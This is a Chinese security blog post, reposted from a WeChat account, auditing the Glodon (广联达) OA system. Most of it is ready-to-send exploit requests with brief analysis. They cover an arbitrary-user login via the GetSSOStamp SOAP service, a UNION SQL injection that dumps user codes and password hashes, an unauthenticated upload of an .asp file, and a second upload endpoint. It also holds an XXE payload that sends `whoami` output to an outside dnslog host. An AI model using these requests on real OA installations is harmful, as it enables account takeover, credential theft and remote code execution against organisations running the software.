免责声明:
0x01 漏洞分析
任意用户登录
/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx
找到GetSSOStamp.DLL
传入usercode 参数
POST /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx HTTP/1.1
Host: x
Content-Type: text/xml; charset=utf-8
Content-Length: 355
SOAPAction: "http://tempuri.org/GetStamp"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetStamp xmlns="http://tempuri.org/">
<usercode>
admin</usercode>
</GetStamp>
</soap:Body>
</soap:Envelope>
登录接口
/Services/Identification/Server/login.ashx?sso=1&ssoProvider=WorkflowSSO&LoginFlag=custom&UserCode=admin&LoginCredence=856F1154F61FE89FDE236B64F565502C&LoginTimestamp=758027442&service=http://xxxxxx/Portal/Frame/layoutA/Default.aspx
SQL注入
/Webservice/IM/Config/ConfigService.asmx
ConfigService 继承 WebService 很容易看出没有权限建立
GetIMDictionary
走进 ConfigService.getIMDictValue
直接进行拼接
POST /Webservice/IM/Config/ConfigService.asmx HTTP/1.1
Host: x
Content-Length: 428
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Content-Type: text/xml; charset=utf-8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://180.140.115.138:91/Webservice/IM/Config/ConfigService.asmx?op=GetIMDictionary
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetIMDictionary xmlns="http://tempuri.org/">
<key>1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --</key>
</GetIMDictionary>
</soap:Body>
</soap:Envelope>
前台任意文件上传
One
获得key
当传入进来的CMD 不等于queryUplaodResult 和checkFileExists 就进入ProcessGetAuthorizeKey
需要destDir destFilename这两个参数
POST /Services/FileService/UserFiles/GetAuthorizeKey.ashx HTTP/1.1
Host: x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
cmd=&destDir=./sysinfo/&destFilename=qrxyrgwa.asp
Two
三个参数 上传上去 然后创建文件
POST /Services/FileService/UserFiles/UserFilesUpload.ashx HTTP/1.1
Host: x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Length: 555
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="key"
f3c7e655-9ecf-4e81-a7c1-da2e1172ff7b
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="destDir"
./sysinfo/
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="destFilename"
qrxyrgwa.asp
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="file";filename="qrxyrgwa.asp"
content-type:image/png
<% response.write("qrxyrgwa")%>
------WebKitFormBoundarytCOFhbEjc3IfYaY5--
金格文件上传
//GB/LK/Common/ashx/WebRevisionAjax.ashx
POST /GBLKCommonashxWebRevisionAjax.ashx HTTP/1.1
Host: xxxxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
DBSTEP V3.0 170 0 1000
DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
TableKey=MTExMTE=
FILENAME=MS5hc3A=
123456
XXE
/GB/LK/Document/DataExchange/DataExchange.ashx
SystemName=BIM 进入下一步
很明显的XXE
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Sec-Purpose: prefetch;prerender
Purpose: prefetch
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Length: 405
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"
BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://`whoami`.mw8goc.dnslog.cn/">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
原文始发于微信公众号(小黑说安全):1day | 广联达OA系统审计
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论